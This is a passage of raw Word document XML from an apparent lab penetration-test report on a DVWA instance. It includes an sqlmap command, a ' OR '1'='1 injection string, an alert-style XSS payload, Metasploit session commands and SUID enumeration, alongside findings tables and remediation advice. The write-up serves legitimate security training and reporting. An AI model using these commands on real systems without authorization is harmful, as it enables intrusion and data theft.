          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>/login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CEBEA3" w14:textId="67413E50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6CCE3FB" w14:textId="682F6BAC" w:rsidR="00861B7F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Step-by-Step Testing Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54261745" w14:textId="1998EBFA" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="00861B7F" w:rsidP="009B72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8251A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>A. SQ</w:t>
      </w:r>
      <w:r w:rsidR="009B72D7" w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>L Injection test (automated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54578C0E" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Run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sqlmap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against login form (lab test account):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778081CF" w14:textId="3825173B" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52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sqlmap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-u "http://198.168.178.150/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login.php?username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admin&amp;password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>=PASS" --data="username=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admin&amp;password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>=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PASS&amp;Login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>=Login" --batch --level=3 --risk=2 --threads=4 -p password --technique=BEUST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1800D78A" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Manual confirmation: supply username' OR '1'='1 etc. Log response differences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF6AEC8" w14:textId="79491DBA" w:rsidR="00861B7F" w:rsidRDefault="0058251A" w:rsidP="005825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506718B" wp14:editId="18B4B924">
            <wp:extent cx="5726002" cy="2347941"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="15939804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32" b="23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152" cy="23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90A0F7" w14:textId="77777777" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A" w:rsidP="005825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3598DFD" w14:textId="159A6FDB" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="00861B7F" w:rsidP="009B72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8251A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="009B72D7" w:rsidRPr="009B72D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. XSS testing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA92057" w14:textId="46CF33D7" w:rsidR="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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lastRenderedPageBreak/>
        <w:t>Send payloads via Burp Repeater. Example reflected payloads: &lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>/script&gt; and HTML-encoded variations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731EB2AD" w14:textId="360CAC20" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A" w:rsidP="0058251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216716D9" wp14:editId="06DCC509">
            <wp:extent cx="5733415" cy="2057400"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="161970220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70220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278C5" w14:textId="58B3802D" w:rsidR="009E39E7" w:rsidRPr="009B72D7" w:rsidRDefault="009E39E7" w:rsidP="009E39E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E8DB66F" w14:textId="6BBFF64F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Test Log </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable2"/>
        <w:tblW w:w="8493" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1144"/>
        <w:gridCol w:w="1985"/>
        <w:gridCol w:w="1250"/>
        <w:gridCol w:w="4114"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E39E7" w:rsidRPr="009B72D7" w14:paraId="28032959" w14:textId="77777777" w:rsidTr="009E39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C8A94" w14:textId="77777777" w:rsidR="009E39E7" w:rsidRPr="009B72D7" w:rsidRDefault="009E39E7" w:rsidP="009B72D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Test ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="597D29D4" w14:textId="77777777" w:rsidR="009E39E7" w:rsidRPr="009B72D7" w:rsidRDefault="009E39E7" w:rsidP="009B72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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31BA9098" w14:textId="77777777" w:rsidR="009E39E7" w:rsidRPr="009B72D7" w:rsidRDefault="009E39E7" w:rsidP="009B72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5D49E43E" w14:textId="77777777" w:rsidR="009E39E7" w:rsidRPr="009B72D7" w:rsidRDefault="009E39E7" w:rsidP="009B72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Target URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E39E7" w:rsidRPr="009B72D7" w14:paraId="66E60D3D" w14:textId="77777777" w:rsidTr="009E39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56165F" w14:textId="77777777" w:rsidR="009E39E7" w:rsidRPr="009B72D7" w:rsidRDefault="009E39E7" w:rsidP="009B72D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001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DA50897" w14:textId="77777777" w:rsidR="009E39E7" w:rsidRPr="009B72D7" w:rsidRDefault="009E39E7" w:rsidP="009B72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SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F4746AC" w14:textId="77777777" w:rsidR="009E39E7" w:rsidRPr="009B72D7" w:rsidRDefault="009E39E7" w:rsidP="009B72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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C6F08B4" w14:textId="77777777" w:rsidR="009E39E7" w:rsidRPr="009B72D7" w:rsidRDefault="009E39E7" w:rsidP="009B72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hyperlink r:id="rId12" w:history="1">
              <w:r w:rsidRPr="009B72D7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N"/>
                </w:rPr>
                <w:t>http://198.168.178.150/login.php</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E39E7" w:rsidRPr="009B72D7" w14:paraId="289C7BDD" w14:textId="77777777" w:rsidTr="009E39E7">
        <w:trPr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6DC04" w14:textId="77777777" w:rsidR="009E39E7" w:rsidRPr="009B72D7" w:rsidRDefault="009E39E7" w:rsidP="009B72D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002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10834CCA" w14:textId="77777777" w:rsidR="009E39E7" w:rsidRPr="009B72D7" w:rsidRDefault="009E39E7" w:rsidP="009B72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XSS Reflected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="182591DD" w14:textId="77777777" w:rsidR="009E39E7" w:rsidRPr="009B72D7" w:rsidRDefault="009E39E7" w:rsidP="009B72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745992C4" w14:textId="77777777" w:rsidR="009E39E7" w:rsidRPr="009B72D7" w:rsidRDefault="009E39E7" w:rsidP="009B72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hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidRPr="009B72D7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N"/>
                </w:rPr>
                <w:t>http://198.168.178.150/form.php</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1648936C" w14:textId="02626914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94C4A4E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50-word Web Test Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECB9BC0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Conducted OWASP Top 10 checks on DVWA (198.168.178.150) using Burp Suite and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sqlmap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>. Found critical SQL injection on login and reflected XSS in user form. Logged exploitability, captured proof-of-concept requests/responses, and recommended input validation, parameterized queries, and output encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AB1D98" w14:textId="1465DCD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ED7E054" w14:textId="3E20AEC0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Findings Table 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015"/>
        <w:gridCol w:w="1519"/>
        <w:gridCol w:w="918"/>
        <w:gridCol w:w="3390"/>
        <w:gridCol w:w="2177"/>
      </w:tblGrid>
      <w:tr w:rsidR="0058251A" w:rsidRPr="009B72D7" w14:paraId="2E65A562" w14:textId="77777777" w:rsidTr="00582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C5DAE2" w14:textId="77777777" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A" w:rsidP="009B72D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Finding ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="336AE286" w14:textId="77777777" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A" w:rsidP="009B72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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26810107" w14:textId="77777777" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A" w:rsidP="009B72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CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E1134EC" w14:textId="77777777" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A" w:rsidP="009B72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Affected URL / Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3528113C" w14:textId="77777777" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A" w:rsidP="009B72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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0058251A" w:rsidRPr="009B72D7" w14:paraId="3727D9EC" w14:textId="77777777" w:rsidTr="00582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6617E" w14:textId="77777777" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A" w:rsidP="009B72D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F001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A56DDCA" w14:textId="77777777" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A" w:rsidP="009B72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SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11875F02" w14:textId="77777777" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A" w:rsidP="009B72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9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1154944A" w14:textId="77777777" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A" w:rsidP="009B72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hyperlink r:id="rId14" w:history="1">
              <w:r w:rsidRPr="009B72D7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N"/>
                </w:rPr>
                <w:t>http://198.168.178.150/login.php</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74C99613" w14:textId="77777777" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A" w:rsidP="009B72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parameterized queries, limit DB user privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0058251A" w:rsidRPr="009B72D7" w14:paraId="739729A4" w14:textId="77777777" w:rsidTr="00582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E0083B" w14:textId="77777777" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A" w:rsidP="009B72D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F002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43A87C93" w14:textId="77777777" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A" w:rsidP="009B72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XSS Reflected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31BFF5A2" w14:textId="77777777" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A" w:rsidP="009B72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6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C3F26B6" w14:textId="77777777" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A" w:rsidP="009B72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hyperlink r:id="rId15" w:history="1">
              <w:r w:rsidRPr="009B72D7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IN"/>
                </w:rPr>
                <w:t>http://198.168.178.150/form.php</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DBCEC50" w14:textId="77777777" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A" w:rsidP="009B72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Output </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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encode</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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, CSP, input validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="092564EE" w14:textId="6CCD8752" w:rsid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C255D11" w14:textId="6C618E06" w:rsidR="0058251A" w:rsidRDefault="0058251A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0151CEDE" wp14:editId="2163F53D">
            <wp:extent cx="5733415" cy="2571750"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="5044848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7FC2D" w14:textId="77777777" w:rsidR="0058251A" w:rsidRPr="009B72D7" w:rsidRDefault="0058251A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A9DA4BF" w14:textId="09623520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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A3D158" w14:textId="12BBFA11" w:rsid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During an authorized security assessment of your web application on 198.168.178.150, we identified a critical SQL injection vulnerability allowing unauthorized access to backend data and a reflected XSS issue that could enable session theft. We recommend immediate patching: apply least-privilege database accounts, implement parameterized queries, validate and encode user input, and enforce strong session handling. Remediation reduces business risk and prevents data exposure. We can prioritize fixes and re-scan to confirm remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CE12D9" w14:textId="77777777" w:rsidR="009E39E7" w:rsidRDefault="009E39E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56089D4" w14:textId="000E1760" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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B254B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Findings table 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1004"/>
        <w:gridCol w:w="1568"/>
        <w:gridCol w:w="820"/>
        <w:gridCol w:w="1042"/>
        <w:gridCol w:w="3083"/>
        <w:gridCol w:w="1502"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB254B" w:rsidRPr="00DB254B" w14:paraId="4DFF24BC" w14:textId="77777777" w:rsidTr="00DB2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9445CF" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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Finding ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A46EE17" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E28C4AA" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D0DA592" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F959698" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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Target URL / Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28BF4D24" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254B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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB254B" w:rsidRPr="00DB254B" w14:paraId="0AF45C5F" w14:textId="77777777" w:rsidTr="00DB2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12526" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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F001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="086B0F61" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E39B749" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57392417" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="462A6584" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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http://198.168.178.200/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="638546A7" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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prepared statements; param. validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB254B" w:rsidRPr="00DB254B" w14:paraId="7588B2D7" w14:textId="77777777" w:rsidTr="00DB2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886AF9" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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F002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B7CB0B8" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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Reflected XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="199449A7" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68DA5818" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B72750D" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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http://198.168.178.200/form</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11012F85" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254B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encoding; CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB254B" w:rsidRPr="00DB254B" w14:paraId="76DA170E" w14:textId="77777777" w:rsidTr="00DB25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1E4C8" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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F003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32F29E1B" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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Insecure File Upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20A8364C" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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8.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7037B5D5" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24479D5F" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254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http://198.168.178.129/upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A6D1C0D" w14:textId="77777777" w:rsidR="00DB254B" w:rsidRPr="00DB254B" w:rsidRDefault="00DB254B" w:rsidP="00DB254B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Validate file type; sanitize names</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1686D8DC" w14:textId="77777777" w:rsidR="009E39E7" w:rsidRPr="009B72D7" w:rsidRDefault="009E39E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1A2E679" w14:textId="687BD3D5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B72D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Post-Exploitation &amp; Evidence Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51709110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Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6679FC3C" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Escalate privileges where appropriate, collect artifacts, and preserve chain-of-custody.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CE7970" w14:textId="4E3A36E1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C15B041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Step-by-Step Procedure (post-exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27177D1D" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Stabilize session: upgrade to a stable shell (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meterpreter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shell → background).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2790A9" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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# in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msfconsole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after session opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E5760A" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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sessions -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i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&lt;id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1141ED43" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7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Privilege escalation (lab only): run local exploit or enumerate SUIDs /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sudo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rights:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2937DE89" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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# basic Linux enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F60F447" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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uname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-a; id;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sudo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-l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25881EB6" w14:textId="77777777" w:rsidR="009B72D7" w:rsidRPr="009B72D7" w:rsidRDefault="009B72D7" w:rsidP="009B72D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="72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find / -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720EFA90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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
